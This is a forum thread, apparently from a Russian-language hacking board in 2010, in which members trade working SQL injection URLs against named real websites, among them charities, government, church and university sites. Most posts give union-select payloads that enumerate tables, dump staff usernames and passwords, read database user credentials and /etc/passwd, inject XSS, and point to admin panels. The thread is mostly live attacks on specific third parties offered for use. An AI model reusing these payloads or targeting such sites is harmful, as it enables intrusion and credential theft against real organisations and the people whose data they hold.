SQL Injections

Discussion in 'Vulnerabilities' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. попугай

    попугай Elder

    p_blog@localhost:4.1.21:p_blog
     
    4 people like this.
  2. $n@ke

    $n@ke Elder

    User: [email protected]
    Version:5.0.27-standard-log
    Dbname:marianweb

    Mini hosting. User is root. Version is 5.
     
    #11522 $n@ke, 19 Mar 2010
    Last edited: 19 Mar 2010
    1 person likes this.
  3. CyberHunter

    CyberHunter Active Member

    Code:
    http://www.romanempiretours.com/stour.php?id=11+union+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+--+
    MySql 5.1
     
  4. Dr..VATSON

    Dr..VATSON Elder

    TIC = 10

    5.0.22-Debian_0ubuntu6.06.12-log


    Code:
    http://www.ibis.dk/stoet/index.php?mode=readmenu&menuId=-23+union+select+1,group_concat%28column_name%29,3,4,5,6+from+information_schema.columns+   where+table_name=char%28107,105,100,95,115,116,97,102,102%29%20--
    From the table kid_staff

    staff_id
    username
    password
    usertype
    firstname
    middlename
    lastname
    gender
    country
    country_es
    region
    nationality
    nationality_es
    birthdate
    lastmod
    webstatus
    rank
    status
     
    #11524 Dr..VATSON, 19 Mar 2010
    Last edited by a moderator: 20 Mar 2010
    1 person likes this.
  5. Dr..VATSON

    Dr..VATSON Elder

    Code:
    http://jobmillion.com/en/member/detail-job.php?action=showlist&ID=-10+union+select+1,2,3,4,5,6,7,8,group_concat%28million_system_staff_Password%29,group_concat%28million_system_staff_UserName%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+million_system_staff%20--

    From the table million_system_staff

    O U T P U T

    million_system_staff_ID
    million_system_staff_Name
    million_system_staff_Email
    million_system_staff_UserName
    million_system_staff_Password
    million_system_staff_CreateByID
    million_system_staff_CreateBy
    million_system_staff_CreateDate
    million_system_staff_LastLoginDate
    million_system_staff_Status
    million_system_staff_Level


    A D M I N   P A N E L

    http://jobmillion.com/stats



    Code:
    http://www.infowomen.org/portfolio/clc/web_app/admin/job.php?job_id=-1+union+select+group_concat%28column_name%29+from+information_schema.columns+where+table_name=char%28116,98,108,95,112,101,114,115,111,110,115%29%20--

    From the table tbl_persons

    O U T P U T

    person_id
    first_name
    last_name
    client_id
    job_id
    email_address
    password
    y_n_recipient


    A D M I N   P A N E L

    http://www.infowomen.org/admin


    TIC = 10

    5.1.26-rc

    AVTOTYRE@localhost



    Code:
    http://www.avto-tyre.ru/shop.php?id=-27+union+select+1,2,group_concat%28column_name%29,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.columns+where+table_name=char%2897,100,100,114,101,115,115%29%20--
    From the table address

    address_id
    user_id
    name
    index
    region
    city
    street
    telephon
    info
    address_id
    user_id
    index
    region
    district
    city
    name
    telephon
    fax
    street
    house
    building
    stroenie
    flat
    entrance
    floor
    code
    info
     
    #11525 Dr..VATSON, 20 Mar 2010
    Last edited: 20 Mar 2010
  6. CyberHunter

    CyberHunter Active Member

    Code:
    http://www.brain-tumor.org/?id=-11+union+select+1,concat%28user%28%29,version%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+
     
    2 people like this.
  7. Darren

    Darren Banned

    http://www.accessoriescoop.com/products.php?cid=49/**/and/**/1=2/**/union/**/select/**/1,version(),3,4/*

    4.1.22-standard

    I couldn't guess the table names, which is embarrassing of course (. How can SQL injections like this be used? Help somebody
     
    2 people like this.
  8. Konqi

    Konqi Green member

    http://www.naregatsi.org/new/arm/events/up_events_details.php?event_id=1+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28

    version() 5.1.45-log
    user() naregats_tigran@localhost
    database() naregats_naregatsi

    + XSS

    http://www.naregatsi.org/new/arm/events/up_events_details.php?event_id=1+and+1=0+union+select+1,2,3,4,5,<img src=http://forum.antichat.ru/antichat/pic/logo.gif width=500 hegth=800></img>,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
     
    _________________________
    2 people like this.
  9. SEWERN

    SEWERN Elder

    http://surediamond.com/product.php?disproid=53+union+select+1,2,version(),4,5--
    Can this be taken any further? Let me know by PM, thanks.
     
    #11529 SEWERN, 21 Mar 2010
    Last edited: 21 Mar 2010
  10. root_sashok

    root_sashok Elder

    Code:
    http://www.che-esche.com/fullafisha.php?id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15
    Code:
    http://thedivinemercy.org/news/department.php?PLID=-72+union+select+1,user(),version(),4,5/*
    Code:
    http://www.ktcomputer.de/start.php?kat=news&kat_id=-1+union+select+1,2,3,4,5,6,7,8,version(),user(),11,12,13,14,15,16,17--
    My first SQL injections, I'm practicing :)
     
    2 people like this.
  11. Konqi

    Konqi Green member

    http://www.revues-plurielles.org/php/index.php?nav=revue&no=17+union+select+1,2,3,4,5

    OS -Windows NT

    user() revues-plu-admin@localhost
    version() 5.0.21-community-nt
    database() revues-plurielles

    + XSS

    http://www.revues-plurielles.org/php/index.php?nav=revue&no="><script>alert('ANTICHAT')</script>
     
    _________________________
    2 people like this.
  12. root_sashok

    root_sashok Elder

    Code:
    http://www.zeltarasa.com/?lang=ru&id=1+union+select+1,concat_ws(0x3a,user(),database(),version())+--
    Code:
    http://www.fotomundo.com/nota.php?id=-1+union+select+1,2,3,4,version(),user(),7,database(),9,10,11,12,13,14,15--
    Code:
    http://krasuis.ru/inset/foto.php?id=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4--
    Code:
    http://www.provisor.com.ua/news.php?art=-1+union+select+1,2,3,4,5,6,7,user(),version(),database()--
    Code:
    http://www.boxclever.ca/news.php?id=-1+union+select+version(),2,user(),database(),5+--+
    Code:
    http://www.ekomtech.kiev.ua/a-news/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9--
    Code:
    http://shepherdpost.christianpost.com/mainbox/news.php?cat=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9+--+
    The tables can be viewed here:
    Code:
    http://shepherdpost.christianpost.com/mainbox/news.php?cat=-1+union+select+1,2,3,table_name,5,6,7,8,9+from+information_schema.tables+--
    Code:
    http://dev.ultimareplenisher.com/news.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version()),2--
    Code:
    http://www.kpbptpn.co.id/news.php?lang=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13--
    Code:
    http://views24hours.com/view24hours/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9--
    Here the output is at the very bottom, on the right.
    Code:
    http://www.tagittins.co.uk/news.php?id=-1+union+select+1,user(),3,database(),5,6,7,8,9--
    Code:
    http://avto-tire.ru/item_view.php?id=&item_id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17+--+
    There are 54 tables here; the last one:
    Code:
    http://avto-tire.ru/item_view.php?id=&item_id=-1+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables+limit+54,1--+
    Code:
    http://www.ctaholidays.net/beta/holiday_details.php?id=-1+union+select+1,2,3,4,5,6,7,user(),9,10,11,12,13,14,database()--
     
    #11532 root_sashok, 21 Mar 2010
    Last edited: 22 Mar 2010
    2 people like this.
  13. $n@ke

    $n@ke Elder

    User: scully@localhost
    Version: 4.1.22-log
    Dbname: scully

    There is a members table
     
    1 person likes this.
  14. Konqi

    Konqi Green member

    http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+select+1,2,3,concat(user,char(58),password),5,6+from+mysql.user--

    OS - Debian GNU/Linux

    user() : root@localhost

    version() : 4.0.24_Debian-10sarge1-log

    database() : ens_data


    robots.txt:

    User-agent: *
    Disallow: /chbpascal/
    Disallow: /college/video_college
    Disallow: /college/photos
    Disallow: /college/vignettes
    Disallow: /college/en/video_college
    Disallow: /college/en/photos
    Disallow: /college/en/vignettes
    Disallow: /en/audio
    Disallow: /en/bonus
    Disallow: /en/photos
    Disallow: /en/video
    Disallow: /en/video_stream
    Disallow: /en/vignettes
    Disallow: /pear
    Disallow: /photos
    Disallow: /administration
    Disallow: /vignettes
    Disallow: /college2
    Disallow: /video
    Disallow: /audio
    Disallow: /video_stream
    Disallow: /bonus

    /etc/passwd

    http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+select+1,2,3,load_file(CHAR(47,101,116,99,47,112,97,115,115,119,100)),5,6+from+mysql.user--



    +XSS

    http://www.diffusion.ens.fr/index.php?res=themes&idtheme=30+and+1=0+union+select+1,2,3,<img src=http://img525.imageshack.us/img525/7127/matrixic9.jpg></img>,5,6--
     
    _________________________
    3 people like this.
  15. root_sashok

    root_sashok Elder

    Here the output is in the heading:
    Code:
    http://map64.ru/index.php?id=-1+union+select+user()--
    There is a users table; it is the last one:
    Code:
    http://map64.ru/index.php?id=-1+union+select+table_name+from+information_schema.tables+limit+23,1--
    Admin panel:
    Code:
    http://www.map64.ru/job
     
    #11535 root_sashok, 22 Mar 2010
    Last edited: 22 Mar 2010
    2 people like this.
  16. $n@ke

    $n@ke Elder

    dudu,edu

    version:4
    ----------------------------------
    Output is in the title
     
    #11536 $n@ke, 22 Mar 2010
    Last edited: 22 Mar 2010
    2 people like this.
  17. kori256

    kori256 Member

    and the same one
    User: dynamicdb@localhost
    Version: 5.0.27
    Dbname: dynamic
     
    #11537 kori256, 22 Mar 2010
    Last edited: 22 Mar 2010
    2 people like this.
  18. root_sashok

    root_sashok Elder

    Code:
    http://www.conacyt.gov.py/admin/mostrar.php?noti=imagen&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())--
    Username: web@localhost
    Database: web
    Version: 5.0.26

    Code:
    http://www.wyoptv.org/programming/viewprogram.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,version(),database()/*
    Username: wyoptv@localhost
    Database: wyoptv
    Version: 5.0.32-Debian_7etch6-log

    Code:
    http://www.2how.com/board/index.php?group=-1+union+select+1,2,3,4,version%28%29,6,7,8,9,10,11,12,13--
    Username: root@localhost
    Database: howhow_board
    Version: 5.0.67-log

    Code:
    http://www.china-efe.org/article/article_show.php?article_id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16--
    Username: chinaedu@localhost
    Database: chinaefe
    Version: 5.1.11-beta-log
     
    #11538 root_sashok, 22 Mar 2010
    Last edited: 22 Mar 2010
    1 person likes this.
  19. CyberHunter

    CyberHunter Active Member

    Code:
    http://lf-j.com/regi.php?id=-19+union+select+1,2,version%28%29,4,5,6,7,8,9+--+
    Version: 5.0.89-community-log
    User: lfjcom_user@localhost
    Database: lfjcom_db

    Code:
    http://www.pitatel.com/pclass.php?id=-19+union+select+1,2,3,4,5,concat%28user%28%29,database%28%29,version%28%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
    Version: 4.0.22-standard 5
    User: root@localhost
    Database: mysql 5
     
    #11539 CyberHunter, 22 Mar 2010
    Last edited: 22 Mar 2010
  20. KENTov

    KENTov New Member

    ScHoOlKiDs are hunting for SQL injections :rolleyes: :rolleyes: :rolleyes:

    PHP:
    Target: http://www.turmanidze.ge/en/main.php?id=1223989248
    Host IP: 212.72.131.186
    Web Server: Apache/2.2.14 (FreeBSD) DAV/2
    DB Server: MySQL >=5
    Current User: turmanidze@localhost
    Sql Version: 5.0.77
    Current DB: turmanidze
    System User: turmanidze@localhost
    Host Name: webserver.sanet.ge
    Installation dir: /usr/local/
    DB User: 'turmanidze'@'localhost'
    Data Bases: information_schema
    test
    turmanidze



    http://www.turmanidze.ge/admin/
    http://www.turmanidze.ge/phpmyadmin/

    Look in userlist for the password and login, though for some reason they don't work for me :mad:
     
    2 people like this.